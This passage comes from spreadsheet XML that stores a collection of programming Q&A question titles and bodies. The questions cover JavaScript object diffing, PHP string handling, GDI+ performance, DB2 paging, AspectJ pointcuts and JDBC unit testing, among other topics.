    <t xml:space="preserve">&lt;p&gt;I want to be able to get a list of all differences between two JavaScript object graphs, with the property names and values where the deltas occur. &lt;/p&gt;
&lt;p&gt;For what it is worth, these objects are usually retrieved from the server as JSON and typically are no more than a handful of layers deep (i.e. it may be an array of objects that themselves have data and then arrays with other data objects).&lt;/p&gt;
&lt;p&gt;I want to not only see the changes to basic properties, but differences in the number of members of an array, etc. etc.&lt;/p&gt;
&lt;p&gt;If I don't get an answer, I will probably end up writing this myself, but hope someone has already done this work or know of someone who has.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;EDIT: These objects will typically be very close in structure to one another, so we are not talking about objects that are utterly different from one another, but may have 3 or 4 deltas.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Converting plist to binary plist</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Apple strongly recommends using the binary plist format when reading large XML-based data sets into iPhone apps. Among their reasoning is the fact that XML parsing is very taxing on the iPhone. However, this requires that files residing on the remote web server be converted first.&lt;/p&gt;
&lt;p&gt;For frequently-changing content, it is not acceptable to do this manually. If at all possible, I'd like to avoid having a web based app call the command line to perform the conversion (i.e., plutil). &lt;/p&gt;
&lt;p&gt;Are there publicly available algorithms to perform this conversion?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP removing a character in a string</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My php is weak and I'm trying to change this string:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.site.com/backend.php?/c=crud&amp;amp;m=index&amp;amp;t=care"&gt;http://www.site.com/backend.php?/c=crud&amp;amp;m=index&amp;amp;t=care&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;to be:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.site.com/backend.php?c=crud&amp;amp;m=index&amp;amp;t=care"&gt;http://www.site.com/backend.php?c=crud&amp;amp;m=index&amp;amp;t=care&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;removing the / after the ? on backend.php. Any ideas on the best way to do this?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to find two adjacent repeating digits and replace them with a single digit in Java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to find two adjacent repeating digits in a string and replace with a single one. How to do this in Java. Some examples:&lt;/p&gt;
&lt;p&gt;123345 should be 12345
 77433211 should be 74321&lt;/p&gt;
</t>
  </si>
  <si>
    <t>using jython and open office 2.4 to convert docs to pdf</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I completed a python script using pyuno which successfully converted a document/ xls / rtf etc to a pdf.
Then I needed to update a mssql database, due to open office currently supporting python 2.3, it's ancientness, lacks support for decent database libs. So I have resorted to using Jython, this way im not burdened down by running inside OO python environment using an old pyuno.&lt;/p&gt;
&lt;p&gt;This also means that my conversion code is broken, and I need to now make use of the java libraries instead of the pyuno libs.&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;import com.sun.star.beans.PropertyValue as PropertyValue&lt;br /&gt;
  import com.sun.star.bridge.XUnoUrlResolver as XUnoUrlResolver&lt;br /&gt;
  import com.sun.star.comp.helper.Bootstrap as Bootstrap&lt;br /&gt;
  -&gt;&gt; import com.sun.star.frame.XComponentLoader as XComponentLoader&lt;br /&gt;
  -&gt;&gt; import com.sun.star.frame.XStorable as XStorable&lt;br /&gt;
  import com.sun.star.lang.XMultiComponentFactory as XMultiComponentFactory&lt;br /&gt;
  import com.sun.star.uno.UnoRuntime as UnoRuntime&lt;br /&gt;
  import com.sun.star.uno.XComponentContext as XComponentContext  &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The includes with the '-&gt;&gt;' do not import the compiler does not recognise the com.sun.star.frame cant see the 'frame' bit. These are the libs I have included.&lt;/p&gt;
&lt;p&gt;&lt;img src="http://www.freeimagehosting.net/uploads/eda5cda76d.jpg" alt="alt text" /&gt;&lt;/p&gt;
&lt;p&gt;Some advice on this matter would be well received&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;context = XComponentContext&lt;br /&gt;
  xMultiCompFactory = XMultiComponentFactory&lt;br /&gt;
  xcomponentloader = XComponentLoader  &lt;/p&gt;
  &lt;p&gt;//used in python&lt;br /&gt;
  ctx = None&lt;br /&gt;
  smgr = None&lt;br /&gt;
  doc = None&lt;br /&gt;
  url = None  &lt;/p&gt;
  &lt;p&gt;context = Bootstrap.bootstrap()&lt;br /&gt;
  xMultiCompFactory = self.context.getServiceManager()&lt;br /&gt;
  xcomponentloader = UnoRuntime.queryInterface(XComponentLoader.class,  ....xMultiCompFactory.createInstanceWithContext("com.sun.star.frame.Desktop", context))  &lt;/p&gt;
  &lt;p&gt;file = "file:\\" + file&lt;br /&gt;
  // also what is the equivalent of url = uno.systemPathToFileUrl(file) in Java so that I can make use of it to nicely format my path&lt;br /&gt;
  properties = []&lt;br /&gt;
  p = PropertyValue()&lt;br /&gt;
  p.Name = "Hidden"&lt;br /&gt;
  p.Value = True&lt;br /&gt;
  properties.append(p)&lt;br /&gt;
  properties = tuple(properties)&lt;br /&gt;
  doc = xcomponentloader.loadComponentFromURL(file, "_blank",0, properties)  &lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>Sensitive data in Viewstate?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to store sensitive data across few pages (run over https) per session.&lt;/p&gt;
&lt;p&gt;I can't use session object, for the primary reason being that the session store is designed as just as backup store (primarily make service calls and load the session). If the session has been restarted or in other words that the key in the session does not exist, make the service and re-populate the session.&lt;/p&gt;
&lt;p&gt;So, in the case of user keyed in sensitive data, i need to carry this data forward across pages, we do not have a persistent store for now, therefore option left is storing these sensitive data in Viewstate. &lt;/p&gt;
&lt;p&gt;1) Should I encrypt the data and store then in Viewstate (not recommended though - sec &amp;amp; perf. implications)
OR
2) Should i store the data in a serializable class and store that in Viewstate? (not recommended again due to perf. implications)&lt;/p&gt;
&lt;p&gt;Any opinion please?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I create an editable dropdownlist in HTML?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to create a text field with a dropdown list that lets the user choose some predefined values. The user should also be able to type a new value or select a predefined one from a dropdown list. I know that I can use two widgets for that but in my app it would be more ergonomnic if it was unified in a one widget.&lt;/p&gt;
&lt;p&gt;Is there a standard widget or do I have to use a third party javascript?&lt;/p&gt;
&lt;p&gt;How about browser portability?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to automagically migrate tests from JUnit 3 to JUnit 4?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a bunch of JUnit 3 classes which extend TestCase and would like to automatically migrate them to be JUnit4 tests with annotations such as &lt;code&gt;@Before&lt;/code&gt;, &lt;code&gt;@After&lt;/code&gt;, &lt;code&gt;@Test&lt;/code&gt;, etc.&lt;br&gt;
Any tool out there to do this in a big batch run?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>gdi+ Graphics::DrawImage really slow~~</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using a GDI+ Graphic to draw a 4000*3000 image to screen, but it is really slow. It takes about 300ms. I wish it just occupy less than 10ms.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Bitmap *bitmap = Bitmap::FromFile("XXXX",...);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;//--------------------------------------------
// this part takes about 300ms, terrible!&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int width = bitmap-&amp;gt;GetWidth();
int height = bitmap-&amp;gt;GetHeight();
DrawImage(bitmap,0,0,width,height);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;//------------------------------------------&lt;/p&gt;
&lt;p&gt;I cannot use CachedBitmap, because I want to edit the bitmap later.&lt;/p&gt;
&lt;p&gt;How can I improve it? Or is any thing wrong? &lt;/p&gt;
&lt;p&gt;This native GDI function also draws the image into the screen, and it just take 1 ms:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SetStretchBltMode(hDC, COLORONCOLOR);   
StretchDIBits(hDC, rcDest.left, rcDest.top, 
    	rcDest.right-rcDest.left, rcDest.bottom-rcDest.top, 
    	0, 0, width, height,
    	BYTE* dib, dibinfo, DIB_RGB_COLORS, SRCCOPY);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;//--------------------------------------------------------------&lt;/p&gt;
&lt;p&gt;If I want to use StretchDIBits, I need to pass BITMAPINFO, But how can I get BITMAPINFO from a Gdi+ Bitmap Object? I did the experiment by FreeImage lib, I call StretchDIBits using FreeImageplus object, it draw really fast. But now I need to draw Bitmap, and write some algorithm on Bitmap's bits array, how can I get BITMAPINFO if I have an Bitmap object? It's really annoying      -&lt;strong&gt;_______&lt;/strong&gt;-|&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it worth switching from Visual Studio 2005 to Visual Studio 2008?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As a team we are using Visual Studio 2005 with framework 3.0. I am thinking if it will be nice for us to switch to Visual Studio 2008 with framework 3.5 ? Is it worth it ?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Count Duplicate URLs, fastest method possible</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm still working with this huge list of URLs, all the help I have received has been great.&lt;/p&gt;
&lt;p&gt;At the moment I have the list looking like this (17000 URLs though):&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.domain.com/page?CONTENT_ITEM_ID=1" rel="nofollow"&gt;http://www.domain.com/page?CONTENT_ITEM_ID=1&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.domain.com/page?CONTENT_ITEM_ID=3" rel="nofollow"&gt;http://www.domain.com/page?CONTENT_ITEM_ID=3&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.domain.com/page?CONTENT_ITEM_ID=2" rel="nofollow"&gt;http://www.domain.com/page?CONTENT_ITEM_ID=2&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.domain.com/page?CONTENT_ITEM_ID=1" rel="nofollow"&gt;http://www.domain.com/page?CONTENT_ITEM_ID=1&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.domain.com/page?CONTENT_ITEM_ID=2" rel="nofollow"&gt;http://www.domain.com/page?CONTENT_ITEM_ID=2&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.domain.com/page?CONTENT_ITEM_ID=3" rel="nofollow"&gt;http://www.domain.com/page?CONTENT_ITEM_ID=3&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.domain.com/page?CONTENT_ITEM_ID=3" rel="nofollow"&gt;http://www.domain.com/page?CONTENT_ITEM_ID=3&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;I can filter out the duplicates no problem with a couple of methods, awk etc.  What I am really looking to do it take out the duplicate URLs but at the same time taking a count of how many times the URL exists in the list and printing the count next to the URL with a pipe separator.  After processing the list it should look like this:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;url | count&lt;/strong&gt;&lt;br /&gt;
&lt;a href="http://www.domain.com/page?CONTENT_ITEM_ID=1" rel="nofollow"&gt;http://www.domain.com/page?CONTENT_ITEM_ID=1&lt;/a&gt; | 2&lt;br /&gt;
&lt;a href="http://www.domain.com/page?CONTENT_ITEM_ID=2" rel="nofollow"&gt;http://www.domain.com/page?CONTENT_ITEM_ID=2&lt;/a&gt; | 2&lt;br /&gt;
&lt;a href="http://www.domain.com/page?CONTENT_ITEM_ID=3" rel="nofollow"&gt;http://www.domain.com/page?CONTENT_ITEM_ID=3&lt;/a&gt; | 3&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;What method would be the fastest way to achieve this?&lt;/p&gt;
&lt;p&gt;Cheers&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using Samba for random access without mounting the file system?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using a machine on which I do not have root access and would like to access files on a Samba server in random access mode. I know I can transfer the files in their entirety using smbclient but the files are very large (&gt;1GB) and I would rather just treat them as remote files on which I can do random access.&lt;/p&gt;
&lt;p&gt;The problem as noted is that I don't have root access to this machine (a Linux box) so I can't mount the remote Samba file system. &lt;/p&gt;
&lt;p&gt;Is there a user-level solution that will let me randomly access the contents of a file on a Samba server? Seems it should be possible to do everything that the kernel file system client is doing but from a user-level application.&lt;/p&gt;
&lt;p&gt;I only need read-only access btw and the remote file is guaranteed not to change.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Have you tried Spring Workflow already?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;a href="http://www.springsource.org/extensions/se-workflow"&gt;Spring Workflow&lt;/a&gt; has now been published.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Have you tried it yet? For what kind of scenario?&lt;/li&gt;
&lt;li&gt;What is your impression? How do you find it stacks up against other workflow libs?&lt;/li&gt;
&lt;li&gt;Found any good docs or tutorials?&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Java Video Player</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need a java api, that cannot use JMF, to play video interpreted by the SO codecs but i want to retrieve the each frames in java code. Somebody know some?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Remote posting from one application to another application. Security issue?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any security issue if let say in one application we do a hidden post to another application to make use of that application functionality?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>UTF-16 to UTF-8 conversion (for scripting in Windows)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;what is the best way to convert a UTF-16 files to UTF-8? I need to use this in a cmd script.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Doing a generic &lt;sql:query&gt; in Grails</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is a generic way to select data from a table and show the results in an HTML table using JSP taglibs.  What is the generic way to do this in Grails?  That is, take a few lines of SQL and generate an HTML table from scratch in Grails, including the column names as headers.&lt;/p&gt;
&lt;pre&gt;
&amp;lt;sql:query var="results" dataSource="${dsource}"&gt;
    select * from foo
&amp;lt;/sql:query&gt;
(# of rows: ${results.rowCount})
&amp;lt;table border="1"&gt;
    &amp;lt;!-- column headers --&gt;
    &amp;lt;tr bgcolor=cyan&gt;
        &amp;lt;c:forEach var="columnName" items="${results.columnNames}"&gt;
            &amp;lt;th&gt;&amp;lt;c:out value="${columnName}"/&gt;&amp;lt;/th&gt;
        &amp;lt;/c:forEach&gt;
    &amp;lt;/tr&gt;
    &amp;lt;!-- column data --&gt;
    &amp;lt;c:forEach var="row" items="${results.rowsByIndex}"&gt;
        &amp;lt;tr&gt;
            &amp;lt;c:forEach var="column" items="${row}"&gt;
                &amp;lt;td&gt;&amp;lt;c:out value="${column}"/&gt;&amp;lt;/td&gt;
            &amp;lt;/c:forEach&gt;
        &amp;lt;/tr&gt;
    &amp;lt;/c:forEach&gt;
&amp;lt;/table&gt;
&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>MSV08-C#: How do I stop two groupboxes from auto-parenting themselves when dragged on top of one another?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;IDE: Microsoft Visual Studio Professional 2008&lt;/p&gt;
&lt;p&gt;Language: C#&lt;/p&gt;
&lt;p&gt;Background:
I have one form and two groupboxes that are going to be used as preference catagory groupboxes. My problem is that everytime I drag one groupbox on top of the other (hide/show groupboxes upon listview catagory select), the base groupbox auto-parents the second groupbox I just dragged on top.&lt;/p&gt;
&lt;p&gt;Question:
How do I stop the two groupboxes from auto-parenting themselves when dragged on top of one another?&lt;/p&gt;
&lt;p&gt;// Edit;&lt;/p&gt;
&lt;p&gt;Q) I assume you are trying to acheive a layout where you swap out the visible box? --Mitchel Sellers&lt;/p&gt;
&lt;p&gt;A) Yes I am. I know I could do it at runtime but I'd like to make that my last option in case there is a more appropriate solution.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best tool for creating a societal model</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Lets say I wanted to create some software that models a society. People exist, meet, have children, learn, share experiences etc. Which programming language should I use?&lt;/p&gt;
&lt;p&gt;I would assume that a dynamic language that enables me to swap out methods and/or implement types at run-time would reduce the amount of plumbing that i'd otherwise have to create in a statically typed language. Am I correct?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Paths and CreateProcess</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a question regarding a symptom of my misuse of CreateProcess. I'm using the lpcommandline parameter to feed the path to my executable and parameters.  My misuse is that I have not surrounded the path to the exe with quotes.  &lt;/p&gt;
&lt;p&gt;My question is, why does the CreateProcess work just fine on most computers and not others? I know that the path will have a space in most of the time, yet on 90% of XP machines it works.  I of course found out my issue on those 10% where it did not.  But I'm wondering what is different on the machines where it does not work?  Is there a setting or a policy that any of you folks know about.  And yes, I am going to fix the quote issue. Just curious about why something like this would not have just failed off the bat.  &lt;/p&gt;
&lt;p&gt;So the code would look something like below and the szCommandLine Parameter would be something like below. Notice no quotes around the path to the exe.&lt;/p&gt;
&lt;p&gt;"C:\Program Files\My Company\doit.exe  parameter1 parameter2"&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CreateProcess(
	NULL,			
	szCommandLine,  
	NULL,			
	NULL,			
	FALSE,			
	NULL, 
	NULL,  
	NULL,			
	&amp;amp;si,			
	&amp;amp;pi )
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Messaging over HTTPS</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm about to start a project that requires XML messages to be sent between a couple of servers over HTTPS.  A brief summary is this: I have an application in use by clients that will send information to a central server.  That server will communicate these XML messages to another company's server.  I will also receive messages back from that server and need to fan them out from the central server to the correct clients.  My assumption is that I can write some pages that will receive the messages from my application, post them to the foreign server, and also receive messages from the foreign server, parse them and redirect them accordingly.  Either side can initiate communications.  &lt;/p&gt;
&lt;p&gt;I have not decided on which language to use yet, the most likely seems to be ASP.NET.&lt;/p&gt;
&lt;p&gt;I am looking for some further reading material, but since I am poorly versed in the lingo, I am having trouble locating it.  Does anyone have some good places to start getting acquainted with what I am trying to accomplish?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>AspectJ: parameter in a pointcut</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using AspectJ to advice all the public methods which do have an argument of a chosen class. I tried the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;pointcut permissionCheckMethods(Session sess) : 
    (execution(public * *(.., Session)) &amp;amp;&amp;amp; args(*, sess));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is working wonderfully for methods with at least 2 arguments:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public void delete(Object item, Session currentSession);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but it does not work with methods like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public List listAll(Session currentSession);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How may I change my pointcut to advice both methods executions? In other words: I expected the ".." wildcard to represent "zero or more arguments", but it looks like it means instead "one or more"...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best type 4 Oracle JDBC driver?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the best type 4 Oracle JDBC driver?&lt;/p&gt;
&lt;p&gt;What I want:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Stable, few bugs and quick fixes&lt;/li&gt;
&lt;li&gt;Should warn about the usual JDBC pitfalls (connection leaks, etc)&lt;/li&gt;
&lt;li&gt;Must support CLOB&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;[EDIT] My main issues with the "free" Oracle Type 4 driver are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;I spent two weeks hunting down a cursor leak in the CLOB support code (closing the stream would not close the underlying cursor)&lt;/li&gt;
&lt;li&gt;When you fetch values from a ResultSet, you must process them in order (so you can't get column #3 anymore after fetching column #4)&lt;/li&gt;
&lt;li&gt;getMetaData() on a result set doesn't work until after fetching the first row.&lt;/li&gt;
&lt;li&gt;There were many other bugs and deficiencies but I don't remember them anymore.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So all in all, a driver which costs me $1,000 per seat is more "cheap" than the "free" one from Oracle. The only good thing about the driver was that I didn't have to put databases into TNSNAMES and that I could use a single driver to access Oracle 8, 9 and 10. That's why I ask.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>HTTP Request Timeout</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Python 2.6, a new "timeout" parameter was added to the httplib.HTTPConnection class:
&lt;a href="http://docs.python.org/library/httplib.html#httplib.HTTPConnection" rel="nofollow"&gt;http://docs.python.org/library/httplib.html#httplib.HTTPConnection&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;However, this is only a timeout for the connection to a server.  I am looking to set a timeout value for the &lt;b&gt;request&lt;/b&gt;, not the connection.  This doesn't seem to be supported by httplib.&lt;/p&gt;
&lt;p&gt;Is there any way to emulate this behavior?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>XSL parent child problem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a xml build of&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;elig&amp;gt;
 &amp;lt;subscriber code="1234"/&amp;gt;
    &amp;lt;date to="12/30/2004"
        from="12/31/2004"/&amp;gt;
       &amp;lt;person name="bob"
           ID="654321"/&amp;gt;
       &amp;lt;dog type="labrador"
            color="white"/&amp;gt;
    &amp;lt;location name="hawaii"
              islandCode="01"/&amp;gt;
 &amp;lt;/subscriber&amp;gt;
&amp;lt;/elig&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In XSL I have:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;xsl:template match="subscriber"&amp;gt;
 &amp;lt;xsl:for-each select="date"&amp;gt;
  &amp;lt;xsl:apply-templates match="person" /&amp;gt;
  &amp;lt;xsl:apply-templates match="location" /&amp;gt;
  &amp;lt;xsl:apply-templates match="dog" /&amp;gt;
 &amp;lt;/xsl:for-each&amp;gt;
&amp;lt;/xsl:template&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem I have is that I need the location block in between the person and the dog block. I have tried ../ and it does not work. I simplified this majorly but the point comes across. I can't seem to remember what I need to place in front of location to get it to work. Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Generating PDFs with PHP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a PHP application and a need to generate a PDF with the result of query. The easiest way a found to do this was to use the DOMPDF to generate the PDF for me. So a made a function that generates the HTML for me then a pass this to DOMPDF. In the development and testing enviroment everything was fine but on production enviroment I had some problems with memory usage.&lt;/p&gt;
&lt;p&gt;So I would like to know if my strategy was the best one or if there's a better and easy way to do this.&lt;/p&gt;
&lt;p&gt;How would you do that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to query range of data in DB2 with highest performance?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Usually, I need to retrieve data from a table in some range; for example, a separate page for each search result. In MySQL I use LIMIT keyword but in DB2 I don't know. Now I use this query for retrieve range of data.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT * 
FROM(
   SELECT  
      SMALLINT(RANK() OVER(ORDER BY NAME DESC)) AS RUNNING_NO
      , DATA_KEY_VALUE
      , SHOW_PRIORITY
   FROM 
      EMPLOYEE
   WHERE 
      NAME LIKE 'DEL%'
   ORDER BY
      NAME DESC
   FETCH FIRST 20 ROWS ONLY
) AS TMP
ORDER BY 
  TMP.RUNNING_NO ASC
FETCH FIRST 10 ROWS ONLY
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but I know it's bad style. So, how to query for highest performance?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Show new WinForms window unfocused</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm generating and showing a new WinForms window on top of a Main Window. How can I achieve that the original (Main Window) keeps the focus? Setting the focus back after showing the new window does not solve my problem because I need to prevent the Main Window's title bar from flickering. The new window has to stay on top of the Main Window so I have to set topMost=true. However, this makes no difference for the problem I think.&lt;/p&gt;
&lt;p&gt;Thank you!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to strip punctuation from a string in Python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It seems like there should be a simpler way than:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import string
s = "string. With. Punctuation?" # Sample string 
out = s.translate(string.maketrans("",""), string.punctuation)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>CSS for container divs and falling to the next line</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm more of a programmer than a designer, and I'm trying to embrace &lt;code&gt;&amp;lt;div&amp;gt;&lt;/code&gt;s rather than using tables but am getting stuck.&lt;/p&gt;
&lt;p&gt;Here's what I'm trying to do.  I am setting up a survey page.  I want each question's text to sit at the top of the blue div, and wrap if it's too long.  I want all of the red divs to line up at the top right corner of the container div.&lt;/p&gt;
&lt;p&gt;&lt;img src="http://img528.imageshack.us/img528/4330/divsforsurveyop2.jpg" alt="Layout"&gt;&lt;/p&gt;
&lt;p&gt;Here's what I've started with, it works fine so long as the frame is more than 420 pixels wide.  Then the red div skips to the next line.  I think I may have approached it wrong, perhaps I should be floating things to the right?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;.greencontainer{
    width:100%;
    spacing : 10 10 10 10 ;
    float: left; 
}
.redcontainer{ 
    float: left; 
    width: 20px;
    padding: 2 0 2 0;
    font-size: 11px;
    font-family: sans-serif; 
    text-align: center; 
}
.bluecontainer{ 
    clear: both;
    float: left; 
    width: 400px; 
    padding: 2 2 2 10;
    font-size: 11px;
    font-family: sans-serif; 
    text-align: left; 
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to set a timeout during remote ejb lookup?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to access a remote ejb which is not available yet. But the lookup takes 5 min before I get the NameNotFoundException. Is there a way I can set the lookup timeout to a lesser value so that the client application doesn't hang for 5 mins? 
Thanks in advance...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can we see the source code for PowerShell cmdlets?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm learning some PowerShell. Is it possible to see the source code for a built-in cmdlet like &lt;a href="http://technet.microsoft.com/en-us/library/hh849800.aspx"&gt;Get-ChildItem&lt;/a&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2008 MFC and threads?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was reading this thread/post: &lt;a href="http://stackoverflow.com/questions/262298/windows-c-ui-technology"&gt;http://stackoverflow.com/questions/262298/windows-c-ui-technology&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;and am also wondering about a non .NET UI framework.  Specifically - prior to .NET having support for serial ports (I can't believe they left that out of the first release of .NET) I was forced to use MFC for an application.  I had not been a GUI developer and quickly found myself pulling my hair out due to the horrendous lack of ability for MFC to play nice with other threads in my app - e.g. calling a UI control method to update data or do other things from another thread.  Most of those challenges were dealt with, but the application code is so overly complex with messaging and the like just to handle the shortcomings of MFC.&lt;/p&gt;
&lt;p&gt;So - my question: does the "New and improved" mfc have support for threads - i.e. if I call some mfc control for a gui object from another thread will it crash/puke like the old mfc, or can it play in the real world?&lt;/p&gt;
&lt;p&gt;EDIT&lt;/p&gt;
&lt;p&gt;To clarify - I understand the concern about munging with the GUI in separate threads, but what I was hoping for was that instead of the programmer creating custom messages and sending them from the worker threads - that the GUI framework would do all that work for me and I could just call the object methods from other threads.  Perhaps that is too much to hope for - especially if threads are not part of the language spec yet.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I unit test jdbc code in java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to write some unit tests for some code that connects to a database, runs one or more queries, and then processes the results.
(Without actually using a database)&lt;/p&gt;
&lt;p&gt;Another developer here wrote our own DataSource, Connection, Statement, PreparedStatement, and ResultSet implementation that will return the corresponding objects based on an xml configuration file. (we could use the bogus datasource and just run tests against the result sets it returns).&lt;/p&gt;
&lt;p&gt;Are we reinventing the wheel here? Does something like this exist already for unit testing?
Are there other / better ways to test jdbc code?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>modern for loop for primitive array</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any performance difference between the for loops on a primitive array? &lt;/p&gt;
&lt;p&gt;Assume:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;double[] doubleArray = new double[300000];
for (double var: doubleArray) 
   someComplexCalculation(var);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for ( int i = 0, y = doubleArray.length; i &amp;lt; y; i++)
   someComplexCalculation(doubleArray[i]);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Test result&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I actually profiled it:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Total timeused for modern loop= 13269ms
Total timeused for old loop   = 15370ms
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So the modern loop actually runs faster, at least on my Mac OSX JVM 1.5. &lt;/p&gt;
</t>
